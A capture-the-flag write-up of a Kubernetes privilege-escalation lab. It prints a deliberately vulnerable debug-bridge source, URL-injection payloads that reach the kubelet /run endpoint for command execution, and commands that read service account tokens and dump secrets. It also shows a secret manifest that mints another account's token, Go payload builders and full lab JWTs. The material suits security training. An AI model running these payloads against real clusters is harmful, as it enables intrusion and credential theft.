# Game Of Pods



## Initial Enumeration

- We know that we have compromised a pod and need to escalate privileges by moving either vertically or horizontally.

- At first glance, there are no hidden services or processes running in the container.

Enumerating Kubectl: #

-



We know that our hostname is

test, so we can usekubectl describe po testto get information on the pod.

-

We can see that there is a service account

test-saattached to the pod, and the image is pulled fromhustlehub.azurecr.io-



Check privileges for

test-saservice account:kubectl auth can-i --list

- We can only read pods; we can’t create or interact with any other pods.

-

Enumerating

hustlehub.azurecr.io:- Let’s deeply inspect

testpod, if there is any custom installation script running:-





Deeply inspect the image using https://github.com/wagoodman/dive:

dive hustlehub.azurecr.io/test

-

We can see that

orasis being installed on the container, we can check to see if it is installed properly on the container:

- ORAS → ORAS (OCI Registry As Storage) is a command-line tool and library that extends container registries (like Docker Hub) to store and manage any OCI artifact, not just container images, enabling unified supply chain management by attaching things like SBOMs, Helm charts, or policies to images using the same registry infrastructure.

-

- Let’s deeply inspect

-

-



- Using ORAS to list the images in the `hustlehub.azurecr.io` registry:

      oras repo ls hustlehub.azurecr.io



We can see that there is another image known as

k8s-debug-bridge, Let’s download the image and its artifacts.oras pull hustlehub.azurecr.io/k8s-debug-bridge:latest



oras copy hustlehub.azurecr.io/k8s-debug-bridge:latest --to-oci-layout .

-



- After extracting the artifacts, check the file types in `blobs/sha256`. We can see that there are several gzip archives and JSON files.

      # install file if it is not found
      apk add file
      # check the file types
      file blobs/sha256/*

      049d988b9bf0a21ad8597ad57e538949be03f703977d21d9d30b7da3fc92f983: gzip compressed data, original size modulo 2^32 801792
      0ed2d53c35dc594b40217506326e2f099dc8823fa5838a65736bfce6f1b0115f: JSON text data
      3dc1aacf9e7b7aa152fe92304c74cc2822539cb27e25fe99282b221746d2636a: JSON text data
      44cf07d57ee4424189f012074a59110ee2065adfdde9c7d9826bebdffce0a885: gzip compressed data, original size modulo 2^32 7649792
      4f4fb700ef54461cfa02571ae0db9a0dc1e0cdb5577484a6d75e68dc38e8acc1: gzip compressed data, original size modulo 2^32 1024
      65d8defc58f5d756d55f44a42c1d19ac3b4ea1944ec8f21cfcef70beba9a44db: JSON text data
      7162697db986f5e02d9091e5f29193a473f5fbd2d7b186243813052c9b7b5ed7: JSON text data
      a705d5c6dd51fcfc0c8c7b8989df26b02a88740ae5b696fa8e65ac31f427b72e: JSON text data
      af22b6a1bf08e5477608575f8890ef7cbc61994011a54d37a5edd5630a6b9a6f: gzip compressed data, original size modulo 2^32 5249024
      b65292a38d914152cbd37c828a36b81cd3da1acfd0edaa77bf322332c41bd024: JSON text data
      f055869862fb70dd5a7f7c2b9ac1e9d50b886d9a3b55c1e288ad1ba76644bdae: gzip compressed data, original size modulo 2^32 7168



- While going through the JSON files, we can see that a `k8s-debug-bridge.go` file is copied into the container and that port `8080` is exposed.



- Let’s extract the archives:

      tar xvf af22b6a1bf08e5477608575f8890ef7cbc61994011a54d37a5edd5630a6b9a6f
      tar xvf f055869862fb70dd5a7f7c2b9ac1e9d50b886d9a3b55c1e288ad1ba76644bdae

- Contents of `k8s-debug-bridge.go`:

      // A simple debug bridge to offload debugging requests from the api server to the kubelet.
      package main

      import (
          "crypto/tls"
          "encoding/json"
          "fmt"
          "io"
          "io/ioutil"
          "log"
          "net"
          "net/http"
          "net/url"
          "os"
          "strings"
      )

      type Request struct {
          NodeIP        string `json:"node_ip"`
          PodName       string `json:"pod"`
          PodNamespace  string `json:"namespace,omitempty"`
          ContainerName string `json:"container,omitempty"`
      }

      var (
          httpClient = &http.Client{
              Transport: &http.Transport{
                  TLSClientConfig: &tls.Config{
                      InsecureSkipVerify: true,
                  },
              },
          }
          serviceAccountToken string
          nodeSubnet          string
      )

      // Load the service account token (from its mounted location) and the node IP (from an env var).
      func init() {
          tokenBytes, err := ioutil.ReadFile("/var/run/secrets/kubernetes.io/serviceaccount/token")
          if err != nil {
              log.Fatalf("Failed to read service account token: %v", err)
          }
          serviceAccountToken = strings.TrimSpace(string(tokenBytes))

          nodeIP := os.Getenv("NODE_IP")
          if nodeIP == "" {
              log.Fatal("NODE_IP environment variable is required")
          }
          nodeSubnet = nodeIP + "/24"
      }

      // Endpoints (logs and checkpoint); serve the handlers on port 8080.
      func main() {
          http.HandleFunc("/logs", handleLogRequest)
          http.HandleFunc("/checkpoint", handleCheckpointRequest)

          fmt.Println("k8s-debug-bridge starting on :8080")
          http.ListenAndServe(":8080", nil)
      }

      // GET request to read container logs.
      func handleLogRequest(w http.ResponseWriter, r *http.Request) {
          handleRequest(w, r, "containerLogs", http.MethodGet)
      }

      // POST request to checkpoint (create a stateful copy of) a running container.
      func handleCheckpointRequest(w http.ResponseWriter, r *http.Request) {
          handleRequest(w, r, "checkpoint", http.MethodPost)
      }

      // Craft the URL so that the debug bridge can use the kubelet API.
      // The requester should provide: node IP, pod namespace (app), pod name (app-blog), container name (app-blog).
      func handleRequest(w http.ResponseWriter, r *http.Request, kubeletEndpoint string, method string) {
          // Check that the required params are passed
          req, err := parseRequest(w, r)
          if err != nil {
              return
          }

          // Craft the target URL
          targetUrl := fmt.Sprintf("https://%s:10250/%s/%s/%s/%s", req.NodeIP, kubeletEndpoint, req.PodNamespace, req.PodName, req.ContainerName)
          if err := validateKubeletUrl(targetUrl); err != nil {
              http.Error(w, err.Error(), http.StatusInternalServerError)
              return
          }

          resp, err := queryKubelet(targetUrl, method)
          if err != nil {
              http.Error(w, fmt.Sprintf("Failed to fetch %s: %v", method, err), http.StatusInternalServerError)
              return
          }

          w.Header().Set("Content-Type", "application/octet-stream")
          w.Write(resp)
      }

      // Check that the required params are passed.
      func parseRequest(w http.ResponseWriter, r *http.Request) (*Request, error) {
          if r.Method != http.MethodPost {
              http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
              return nil, fmt.Errorf("invalid method")
          }

          var req Request = Request{
              PodNamespace:  "app",
              PodName:       "app-blog",
              ContainerName: "app-blog",
          }
          if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
              http.Error(w, "Invalid JSON", http.StatusBadRequest)
              return nil, err
          }

          if req.NodeIP == "" {
              http.Error(w, "node_ip is required", http.StatusBadRequest)
              return nil, fmt.Errorf("missing required fields")
          }

          return &req, nil
      }

      func validateKubeletUrl(targetURL string) (error) {
          parsedURL, err := url.Parse(targetURL)
          if err != nil {
              return fmt.Errorf("failed to parse URL: %w", err)
          }

          // Validate target is an IP address.
          // IMPORTANT: this only checks that the parsed hostname is a valid IP;
          // it does not check whether anything extra was passed in node_ip.
          if net.ParseIP(parsedURL.Hostname()) == nil {
              return fmt.Errorf("invalid node IP address: %s", parsedURL.Hostname())
          }

          // Validate IP address is in the nodes /16 subnet (note: init() actually builds a /24)
          if !isInNodeSubnet(parsedURL.Hostname()) {
              return fmt.Errorf("target IP %s is not in the node subnet", parsedURL.Hostname())
          }

          // Prevent self-debugging
          if strings.Contains(parsedURL.Path, "k8s-debug-bridge") {
              return fmt.Errorf("cannot self-debug, received k8s-debug-bridge in parameters")
          }

          // Validate namespace is app: if the second path segment is not 'app', the request is rejected
          pathParts := strings.Split(strings.Trim(parsedURL.Path, "/"), "/")
          if len(pathParts) < 3 {
              return fmt.Errorf("invalid URL path format")
          }
          if pathParts[1] != "app" {
              return fmt.Errorf("only access to the app namespace is allowed, got %s", pathParts[1])
          }

          return nil
      }

      func queryKubelet(url, method string) ([]byte, error) {
          req, err := http.NewRequest(method, url, nil)
          if err != nil {
              return nil, fmt.Errorf("failed to create request: %w", err)
          }
          req.Header.Set("Authorization", "Bearer "+serviceAccountToken)

          log.Printf("Making request to kubelet: %s", url)
          resp, err := httpClient.Do(req)
          if err != nil {
              return nil, fmt.Errorf("failed to connect to kubelet: %w", err)
          }
          defer resp.Body.Close()

          if resp.StatusCode != http.StatusOK {
              body, _ := io.ReadAll(resp.Body)
              log.Printf("Kubelet error response: %d - %s", resp.StatusCode, string(body))
              return nil, fmt.Errorf("kubelet returned status %d: %s", resp.StatusCode, string(body))
          }

          return io.ReadAll(resp.Body)
      }

      func isInNodeSubnet(targetIP string) bool {
          target := net.ParseIP(targetIP)
          if target == nil {
              return false
          }

          _, subnet, err := net.ParseCIDR(nodeSubnet)
          if err != nil {
              return false
          }

          return subnet.Contains(target)
      }
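The subnet check in `isInNodeSubnet` can be tried out on its own. The sketch below is a minimal re-creation, not the bridge's code: the function name `inNodeSubnet` and the `prefixLen` parameter are my own additions, so that the `/24` built in `init()` can be compared with the `/16` mentioned in the source comment. The IP addresses are only examples.

```go
package main

import (
	"fmt"
	"net"
)

// inNodeSubnet mirrors the logic of isInNodeSubnet, with the prefix length
// passed in explicitly (hypothetical parameter, not in the original source).
func inNodeSubnet(nodeIP string, prefixLen int, targetIP string) bool {
	target := net.ParseIP(targetIP)
	if target == nil {
		return false // not a bare IP address
	}
	_, subnet, err := net.ParseCIDR(fmt.Sprintf("%s/%d", nodeIP, prefixLen))
	if err != nil {
		return false
	}
	return subnet.Contains(target)
}

func main() {
	fmt.Println(inNodeSubnet("172.30.0.2", 24, "172.30.0.77"))          // true: same /24
	fmt.Println(inNodeSubnet("172.30.0.2", 24, "172.30.1.5"))           // false: outside the /24
	fmt.Println(inNodeSubnet("172.30.0.2", 16, "172.30.1.5"))           // true: inside the /16
	fmt.Println(inNodeSubnet("172.30.0.2", 24, "172.30.0.2:10250/run")) // false: not a bare IP
}
```

The last call shows that a raw string with extra content is rejected by `net.ParseIP`. The bridge, however, runs this check on the hostname of the parsed URL, not on the raw `node_ip` value.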



- Enumerate live hosts in the current CIDR block:

      nmap -T5 10.43.1.0/24

k8s-debug-bridge:

-

You can get the node ip from

kubectl describe po test, check thenode:field. -



/logsendpoint:curl http://10.43.1.168/logs -d '{"node_ip":"172.30.0.2","namespace":"app","pod":"app-blog","container":"app-blog"}'

-



/checkpointendpoint:curl -X POST http://10.43.1.168/checkpoint -d '{"node_ip":"172.30.0.2","namespace":"app","pod":"app-blog","container":"app-blog"}'

-

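## Exploit

- What we have:

  - The debugger is running on `10.43.1.168` and accepts the parameters `"node_ip":"172.30.0.2"`, `"namespace":"app"`, `"pod":"app-blog"`, and `"container":"app-blog"`.

  - The debugger can get logs and post a checkpoint request to the kubelet API on behalf of the requester.

  - `k8s-debug-bridge` does not properly validate the `node_ip` parameter provided by the requester: it only checks that the host part of the resulting URL is a valid IP address in the node subnet, not whether anything extra was appended to it.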

- How do we exploit this?

-





Upon searching for

exploiting kubelet apiI came across an article that contains documentation for theundocumented kubelet api

-

According to the article, there is a

/runendpoint onkubelet apithat can run a command in a container

-



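- We can pass a malicious payload to run a command in the `app-blog` pod using the `/run` endpoint:

      "node_ip": "172.30.0.2:10250/run/app/app-blog/app-blog?cmd=id#"

- The `#` at the end turns everything the bridge appends after `node_ip` (the port and the original kubelet path) into a URL fragment, so that part is effectively commented out and never reaches the kubelet.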
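To see why the bridge accepts this value, the sketch below rebuilds the target URL with the same format string that `handleRequest` uses and parses it with `net/url`, as `validateKubeletUrl` does. The helper names `buildTargetURL` and `splitTarget` are my own (hypothetical). Only the format string and the checks are taken from the bridge source.

```go
package main

import (
	"fmt"
	"net"
	"net/url"
	"strings"
)

// buildTargetURL mirrors the fmt.Sprintf call in handleRequest.
func buildTargetURL(nodeIP, endpoint, ns, pod, container string) string {
	return fmt.Sprintf("https://%s:10250/%s/%s/%s/%s", nodeIP, endpoint, ns, pod, container)
}

// splitTarget parses the URL and returns the pieces the bridge's checks look at,
// plus the fragment, which an HTTP client does not send to the server.
func splitTarget(target string) (host, path, query, fragment string, err error) {
	u, err := url.Parse(target)
	if err != nil {
		return "", "", "", "", err
	}
	return u.Hostname(), u.Path, u.RawQuery, u.Fragment, nil
}

func main() {
	injected := "172.30.0.2:10250/run/app/app-blog/app-blog?cmd=id#"
	target := buildTargetURL(injected, "checkpoint", "app", "app-blog", "app-blog")

	host, path, query, fragment, err := splitTarget(target)
	if err != nil {
		panic(err)
	}
	parts := strings.Split(strings.Trim(path, "/"), "/")

	fmt.Println("host is a valid IP:    ", net.ParseIP(host) != nil)
	fmt.Println("namespace check passes:", len(parts) >= 3 && parts[1] == "app")
	fmt.Println("path sent to kubelet:  ", path)
	fmt.Println("query sent to kubelet: ", query)
	fmt.Println("fragment (not sent):   ", fragment)
}
```

The hostname is still `172.30.0.2` and the second path segment is still `app`, so both checks pass. The `:10250/checkpoint/...` suffix added by the bridge ends up in the fragment.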

-

- Payload:

-



App-blog:curl -X POST http://10.43.1.168/checkpoint -d '{"node_ip":"172.30.0.2:10250/run/app/app-blog/app-blog?cmd=id#","namespace":"app","pod":"app-blog","container":"app-blog"}' curl -X POST http://10.43.1.168/checkpoint -d '{"node_ip":"172.30.0.2:10250/run/app/app-blog/app-blog?cmd=hostname#","namespace":"app","pod":"app-blog","container":"app-blog"}'

-

We got

RCEon the containerapp-blog. -



- Let’s enumerate any secrets stored on `app-blog`:

      curl -X POST http://10.43.1.168/checkpoint -d '{"node_ip":"172.30.0.2:10250/run/app/app-blog/app-blog?cmd=ls%20/var/run/secrets/kubernetes.io/#","namespace":"app","pod":"app-blog","container":"app-blog"}'
      curl -X POST http://10.43.1.168/checkpoint -d '{"node_ip":"172.30.0.2:10250/run/app/app-blog/app-blog?cmd=ls%20/var/run/secrets/kubernetes.io/serviceaccount#","namespace":"app","pod":"app-blog","container":"app-blog"}'



- Get the service account token:

      curl -X POST http://10.43.1.168/checkpoint -d '{"node_ip":"172.30.0.2:10250/run/app/app-blog/app-blog?cmd=cat%20/var/run/secrets/kubernetes.io/serviceaccount/token#","namespace":"app","pod":"app-blog","container":"app-blog"}'
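The requests above all follow the same pattern, so the JSON body can be generated for any command. This is a minimal sketch: the type `bridgeRequest` and the helpers `injectedNodeIP` and `buildPayload` are hypothetical names of mine, and the field names come from the bridge's `Request` struct. It uses `url.QueryEscape`, which encodes a space as `+` instead of the `%20` used above. Both forms decode to a space in a query string.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/url"
)

// bridgeRequest carries the JSON fields that the debug bridge decodes.
type bridgeRequest struct {
	NodeIP    string `json:"node_ip"`
	Namespace string `json:"namespace"`
	Pod       string `json:"pod"`
	Container string `json:"container"`
}

// injectedNodeIP builds the node_ip value that redirects the bridge to the
// kubelet /run endpoint and ends with '#' to cut off the appended suffix.
func injectedNodeIP(nodeIP, ns, pod, container, cmd string) string {
	return fmt.Sprintf("%s:10250/run/%s/%s/%s?cmd=%s#", nodeIP, ns, pod, container, url.QueryEscape(cmd))
}

// buildPayload returns the JSON body to POST to the bridge's /checkpoint endpoint.
func buildPayload(nodeIP, ns, pod, container, cmd string) (string, error) {
	body, err := json.Marshal(bridgeRequest{
		NodeIP:    injectedNodeIP(nodeIP, ns, pod, container, cmd),
		Namespace: ns,
		Pod:       pod,
		Container: container,
	})
	if err != nil {
		return "", err
	}
	return string(body), nil
}

func main() {
	payload, err := buildPayload("172.30.0.2", "app", "app-blog", "app-blog", "id")
	if err != nil {
		panic(err)
	}
	fmt.Println(payload)
}
```

The printed body can be passed to `curl -X POST http://10.43.1.168/checkpoint -d '<body>'` in the same way as the hand-written payloads.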

-



Decode the token:

eyJhbGciOiJSUzI1NiIsImtpZCI6IjVjWHc0NnVkX0RVeHpLb05zenduT2t6WTUxOTJhTmVSSnpuWFQ5VGp5TEEifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiLCJrM3MiXSwiZXhwIjoxNzk5NzkxNzM5LCJpYXQiOjE3NjgyNTU3MzksImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiNzY5Y2I3ZTctODU0Ny00YTFjLTkxZmQtY2Y3N2MzYzA0Y2JhIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJhcHAiLCJub2RlIjp7Im5hbWUiOiJub2RlciIsInVpZCI6IjgwMWY3YjVkLTIzMzItNDQzYS05ZDQ0LWExOTBkMWM5MzM0ZCJ9LCJwb2QiOnsibmFtZSI6ImFwcC1ibG9nIiwidWlkIjoiYjJhMGM5NDctOWQzYi00ZTk1LTk4ZmYtZmNkMjU0NDExNjhmIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJhcHAiLCJ1aWQiOiI2Y2JiNTU4Ny05OWM5LTQ0YWQtYTgzYi1lMWVlOTYwZTI5NjQifSwid2FybmFmdGVyIjoxNzY4MjU5MzQ2fSwibmJmIjoxNzY4MjU1NzM5LCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6YXBwOmFwcCJ9.Vgj7R2UN03gco5gajDPXkCkJv_DOrpLGwfBNeF4OYzZXUIHltXgd4Bd6ILLtexJ_UEgnkZzY-jzHPt42GfvB-hh0HNspKkfuyZCmYl8nMGVBb1tpa6Cn3VKGwIymHhhW4FXJYXL0b4z1rXUFxf8Hy_0XUP_Ox6jEKplGvnPpPGhTqTDyseQNjHzd6GxdQZdNdZMgvzuIL87x1HxQvHn6ew6BjlDbxcnwHkXYc_YvdchJ8dbc9wqPKaoaJ9eh1CN89dAm3WOqdjlnJ_VC7VRt5YFjcLWw36AxodJiCX4ObqQdn_cBjS5H4ptmuqoSY6KzU9svBgSpEkXLRFi3GkxXbg -
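A service account token is a JWT: three base64url segments separated by dots, where the middle segment holds the claims. The sketch below shows one way to read those claims without verifying the signature. The function name `decodeJWTPayload` is my own, and the token in `main` is a synthetic one built only for illustration, not the token from the challenge.

```go
package main

import (
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
)

// decodeJWTPayload returns the claims of a JWT. It does NOT verify the signature.
func decodeJWTPayload(token string) (map[string]interface{}, error) {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return nil, errors.New("expected three dot-separated segments")
	}
	// JWT segments use unpadded base64url encoding.
	raw, err := base64.RawURLEncoding.DecodeString(parts[1])
	if err != nil {
		return nil, err
	}
	var claims map[string]interface{}
	if err := json.Unmarshal(raw, &claims); err != nil {
		return nil, err
	}
	return claims, nil
}

func main() {
	// Synthetic token for illustration only; header and signature are placeholders.
	payload := base64.RawURLEncoding.EncodeToString([]byte(`{"sub":"system:serviceaccount:demo:demo"}`))
	token := "header." + payload + ".signature"

	claims, err := decodeJWTPayload(token)
	if err != nil {
		panic(err)
	}
	fmt.Println("sub:", claims["sub"])
}
```

For a real service account token, the `sub` claim and the `kubernetes.io` claim show which namespace, pod, and service account the token belongs to.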





- Let’s check what the `app` service account can do:

      export TOKEN="<service account token from the previous step>"
      kubectl --token=$TOKEN auth can-i --list

- We can’t see which API resources the `app` service account has access to, because the service account is not allowed to review the rules applied to itself.





- Check the pods, services, and secrets present in the `app` namespace:

      kubectl --token=$TOKEN get po -n app
      kubectl --token=$TOKEN get svc -n app
      kubectl --token=$TOKEN get secrets -n app

- There is a secret present in the namespace.



- Dump the secret:

      kubectl --token=$TOKEN get secrets -n app -o yaml

- The password hash is too expensive to crack.

- Let’s check the source code of the website running on `app-blog`:

      curl -X POST http://10.43.1.168/checkpoint -d '{"node_ip":"172.30.0.2:10250/run/app/app-blog/app-blog?cmd=ls#","namespace":"app","pod":"app-blog","container":"app-blog"}'
      curl -X POST http://10.43.1.168/checkpoint -d '{"node_ip":"172.30.0.2:10250/run/app/app-blog/app-blog?cmd=cat%20main.go#","namespace":"app","pod":"app-blog","container":"app-blog"}'

- Contents of `main.go`:

      package main

      import (
          "embed"
          "html/template"
          "io/fs"
          "log"
          "net/http"
          "strings"
          "time"

          corev1 "k8s.io/api/core/v1"
          "k8s.io/apimachinery/pkg/api/errors"
          metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
          "k8s.io/client-go/kubernetes"
          "k8s.io/client-go/rest"
      )

      //go:embed templates/*
      var templatesFS embed.FS

      //go:embed static/*
      var staticFS embed.FS

      const (
          port             = "5000"
          namespace        = "app"
          secretNamePrefix = "user-"
      )

      var (
          clientset *kubernetes.Clientset
          templates *template.Template
      )

      type PageData struct {
          Username       string
          Message        string
          Error          string
          ShowRegistered bool
      }

      func main() {
          // Initialize Kubernetes client
          var err error
          config, err := rest.InClusterConfig()
          if err != nil {
              log.Fatalf("Failed to create in-cluster config: %v", err)
          }

          clientset, err = kubernetes.NewForConfig(config)
          if err != nil {
              log.Fatalf("Failed to create Kubernetes clientset: %v", err)
          }

          // Parse templates
          templates, err = template.ParseFS(templatesFS, "templates/*.tmpl")
          if err != nil {
              log.Fatalf("Failed to parse templates: %v", err)
          }

          // Set up routes
          mux := http.NewServeMux()
          mux.HandleFunc("/", handleHome)
          mux.HandleFunc("/register", handleRegister)
          mux.HandleFunc("/login", handleLogin)
          mux.HandleFunc("/logout", handleLogout)

          // Serve static files
          staticSub, _ := fs.Sub(staticFS, "static")
          mux.Handle("/static/", http.StripPrefix("/static/", http.FileServer(http.FS(staticSub))))

          // Wrap with security headers
          handler := securityHeaders(mux)

          log.Printf("Starting server on port %s", port)
          if err := http.ListenAndServe(":"+port, handler); err != nil {
              log.Fatalf("Server failed: %v", err)
          }
      }

      // HTTP handlers

      func handleRegister(w http.ResponseWriter, r *http.Request) {
          if r.Method == "GET" {
              renderTemplate(w, "register.tmpl", nil)
              return
          }

          // POST
          username := r.FormValue("username")
          password := r.FormValue("password")
          confirm := r.FormValue("confirm")

          if username == "" || password == "" {
              renderTemplate(w, "register.tmpl", &PageData{Error: "Username and password required"})
              return
          }

          if password != confirm {
              renderTemplate(w, "register.tmpl", &PageData{Error: "Passwords do not match"})
              return
          }

          secretName := secretNamePrefix + strings.ToLower(username)

          // Check if user exists
          _, err := clientset.CoreV1().Secrets(namespace).Get(r.Context(), secretName, metav1.GetOptions{})
          if err == nil {
              renderTemplate(w, "register.tmpl", &PageData{Error: "Username already taken"})
              return
          }
          if !errors.IsNotFound(err) {
              log.Printf("Error checking secret: %v", err)
              renderTemplate(w, "register.tmpl", &PageData{Error: "Internal error"})
              return
          }

          // Create secret
          secret := &corev1.Secret{
              ObjectMeta: metav1.ObjectMeta{
                  Name: secretName,
                  Labels: map[string]string{
                      "app":       "hustlehub",
                      "component": "auth",
                  },
              },
              Type: corev1.SecretTypeOpaque,
              Data: map[string][]byte{
                  "username":     []byte(username),
                  "passwordHash": []byte(hashPassword(password)),
                  "createdAt":    []byte(time.Now().Format(time.RFC3339)),
              },
          }

          _, err = clientset.CoreV1().Secrets(namespace).Create(r.Context(), secret, metav1.CreateOptions{})
          if err != nil {
              if errors.IsInvalid(err) {
                  renderTemplate(w, "register.tmpl", &PageData{Error: "Invalid username (use lowercase alphanumeric and hyphens)"})
              } else {
                  log.Printf("Error creating secret: %v", err)
                  renderTemplate(w, "register.tmpl", &PageData{Error: "Failed to create user"})
              }
              return
          }

          http.Redirect(w, r, "/login?ok=1", http.StatusSeeOther)
      }

      func handleLogin(w http.ResponseWriter, r *http.Request) {
          if r.Method == "GET" {
              showOk := r.URL.Query().Get("ok") == "1"
              renderTemplate(w, "login.tmpl", &PageData{ShowRegistered: showOk})
              return
          }

          // Handle POST
          username := r.FormValue("username")
          password := r.FormValue("password")

          if username == "" || password == "" {
              renderTemplate(w, "login.tmpl", &PageData{Error: "Username and password required"})
              return
          }

          // Fetch secret
          secretName := secretNamePrefix + strings.ToLower(username)
          secret, err := clientset.CoreV1().Secrets(namespace).Get(r.Context(), secretName, metav1.GetOptions{})
          if err != nil {
              if errors.IsNotFound(err) {
                  renderTemplate(w, "login.tmpl", &PageData{Error: "Invalid credentials"})
              } else {
                  log.Printf("Error fetching secret: %v", err)
                  renderTemplate(w, "login.tmpl", &PageData{Error: "Internal error"})
              }
              return
          }

          // Verify password
          passwordHash := string(secret.Data["passwordHash"])
          if !verifyPassword(password, passwordHash) {
              renderTemplate(w, "login.tmpl", &PageData{Error: "Invalid credentials"})
              return
          }

          // Create session
          sessionCookie, err := createSession(username)
          if err != nil {
              log.Printf("Error creating session: %v", err)
              renderTemplate(w, "login.tmpl", &PageData{Error: "Internal error"})
              return
          }

          http.SetCookie(w, &http.Cookie{
              Name:     cookieName,
              Value:    sessionCookie,
              Path:     "/",
              MaxAge:   int(sessionDuration.Seconds()),
              HttpOnly: true,
              Secure:   true,
              SameSite: http.SameSiteLaxMode,
          })

          http.Redirect(w, r, "/", http.StatusSeeOther)
      }

      func handleHome(w http.ResponseWriter, r *http.Request) {
          if r.URL.Path != "/" {
              http.NotFound(w, r)
              return
          }

          // Check session
          cookie, err := r.Cookie(cookieName)
          if err != nil {
              http.Redirect(w, r, "/login", http.StatusSeeOther)
              return
          }

          session, valid := verifySession(cookie.Value)
          if !valid {
              http.Redirect(w, r, "/login", http.StatusSeeOther)
              return
          }

          renderTemplate(w, "home.tmpl", &PageData{Username: session.Username})
      }

      func handleLogout(w http.ResponseWriter, r *http.Request) {
          http.SetCookie(w, &http.Cookie{
              Name:     cookieName,
              Value:    "",
              Path:     "/",
              MaxAge:   -1,
              HttpOnly: true,
              Secure:   true,
              SameSite: http.SameSiteLaxMode,
          })
          http.Redirect(w, r, "/login", http.StatusSeeOther)
      }

      func renderTemplate(w http.ResponseWriter, tmpl string, data *PageData) {
          if data == nil {
              data = &PageData{}
          }

          // Execute the specific content template first, then wrap with layout
          if err := templates.ExecuteTemplate(w, tmpl, data); err != nil {
              log.Printf("Template error: %v", err)
              http.Error(w, "Internal error", http.StatusInternalServerError)
          }
      }



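- According to the source code, the app uses its in-cluster service account to get and create secrets in the `app` namespace, so the token for `sa:app` can be used to read and create secrets.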



## Exploiting Secrets

- Kubernetes lets you create a special type of secret that stores the token of a service account.

- If you create a secret of type `kubernetes.io/service-account-token` and annotate it with a service account name, it will be auto-populated with a token for that service account.

- Payload (`payload.yaml`):

      apiVersion: v1
      kind: Secret
      metadata:
        name: user-arbaaz
        namespace: app
        annotations:
          kubernetes.io/service-account.name: k8s-debug-bridge
      type: kubernetes.io/service-account-token

- Apply the payload and read back the populated secret:

      kubectl --token=$TOKEN apply -f ./payload.yaml -n app
      kubectl --token=$TOKEN get secrets -n app
      kubectl --token=$TOKEN get secrets user-arbaaz -n app -o yaml
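The same manifest can be generated for any target service account. The sketch below builds it as JSON with the standard library only, since `kubectl apply -f` accepts JSON as well as YAML. The type names and the helper `tokenSecretFor` are hypothetical names of mine, and the values passed in `main` are the ones used in this writeup.

```go
package main

import (
	"encoding/json"
	"fmt"
)

// metadata holds the subset of object metadata this manifest needs.
type metadata struct {
	Name        string            `json:"name"`
	Namespace   string            `json:"namespace"`
	Annotations map[string]string `json:"annotations"`
}

// secret is a minimal representation of a v1 Secret manifest.
type secret struct {
	APIVersion string   `json:"apiVersion"`
	Kind       string   `json:"kind"`
	Metadata   metadata `json:"metadata"`
	Type       string   `json:"type"`
}

// tokenSecretFor builds a service-account-token secret that asks Kubernetes
// to populate it with a token for the named service account.
func tokenSecretFor(name, namespace, serviceAccount string) secret {
	return secret{
		APIVersion: "v1",
		Kind:       "Secret",
		Metadata: metadata{
			Name:      name,
			Namespace: namespace,
			Annotations: map[string]string{
				"kubernetes.io/service-account.name": serviceAccount,
			},
		},
		Type: "kubernetes.io/service-account-token",
	}
}

func main() {
	out, err := json.MarshalIndent(tokenSecretFor("user-arbaaz", "app", "k8s-debug-bridge"), "", "  ")
	if err != nil {
		panic(err)
	}
	fmt.Println(string(out))
}
```

The service account named in the annotation must exist in the same namespace as the secret. Otherwise the secret is not populated.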

- Token:

eyJhbGciOiJSUzI1NiIsImtpZCI6IjVjWHc0NnVkX0RVeHpLb05zenduT2t6WTUxOTJhTmVSSnpuWFQ5VGp5TEEifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJhcHAiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlY3JldC5uYW1lIjoidXNlci1hcmJhYXoiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiazhzLWRlYnVnLWJyaWRnZSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6IjY1ZTUxYjkzLWQ1NTgtNDAyNS1hZTU0LTVjYWRkYzdlY2NiOCIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDphcHA6azhzLWRlYnVnLWJyaWRnZSJ9.sx70_FpzssVWRT24CMA2JDGt-KgZJRTsCqgldSWQnHIVr5GtS5LGc3mm56gcYm6rfYrclrrmxSJE2ccuHEGoNzXcaOq1UsR_Gipv9gUgLbbXfs7tPGwJd3X8uykRrhqFJXg9oMYBPoBUT2CNwQwyuD1EbZo7jLqFvPJSKXNpoqK2QM9gviwjTRrSps9lDKrlotyeNOwLYIlLqIkq6tZRbaRha8exIwMGd_taCbNJfgTDMoHAWm1N2-mDjQMFyLbyYdWcgSwPJnIj8ci8pnGgETNS6JdFPf6zEz23wo8Dr0Xu4TtCytK6nGE2wpTjXmE8pDU5Oglde_A9FLzWbuWc5g -

- Decode the token: the `token` field in the secret's YAML output is base64-encoded, so pipe that value through `base64 -d` to recover the JWT shown above:

      echo "<base64 value of the token field>" | base64 -d

- Export the decoded token:

      export tkn="<decoded token shown above>"





- Permissions of the new service account token:

      kubectl --token=$tkn auth can-i --list
      kubectl --token=$tkn get node

The new token can create:

- nodes/checkpoint

- nodes/proxy

- nodes/status







## Privesc using nodes/proxy & nodes/status

- Searching for privilege escalation paths using these permissions, I found a GitHub advisory on abusing `nodes/proxy` and `nodes/status`.

